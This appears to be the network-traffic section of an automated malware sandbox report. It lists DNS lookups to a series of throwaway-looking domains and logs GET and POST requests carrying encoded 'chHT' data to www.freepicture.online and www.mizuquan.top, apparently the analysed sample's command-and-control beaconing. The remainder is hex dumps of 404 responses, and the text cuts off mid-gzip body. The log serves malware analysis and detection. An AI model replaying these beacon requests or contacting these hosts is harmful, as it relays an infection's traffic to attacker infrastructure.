            Source: global trafficHTTP traffic detected: GET /ed2j/?chHT=HnYP2yoU4dt40olvIDuXD48kL/PNXzgkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjaKCOmMM/uBzrxUijYkdqZPZsj8JBjY2qkwg=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mizuquan.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.726075.buzz
            Source: global trafficDNS traffic detected: DNS query: www.freepicture.online
            Source: global trafficDNS traffic detected: DNS query: www.318st.com
            Source: global trafficDNS traffic detected: DNS query: www.hm62t.top
            Source: global trafficDNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mfgamecompany.shop
            Source: global trafficDNS traffic detected: DNS query: www.quilo.life
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.kckartal.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: unknownHTTP traffic detected: POST /xcfw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.freepicture.onlineOrigin: http://www.freepicture.onlineReferer: http://www.freepicture.online/xcfw/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 201Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 70 71 4d 71 51 49 6b 31 47 71 58 76 74 64 58 32 77 38 75 36 4b 69 61 63 32 2b 35 48 76 58 65 6f 51 3d 3d Data Ascii: chHT=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqpqMqQIk1GqXvtdX2w8u6Kiac2+5HvXeoQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:13 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:48:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:48:31 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:48:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:48:36 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:51 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:53 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 10 Sep 2024 06:49:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-10T06:49:17.6317063Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:32 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:35 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:37 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:40 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 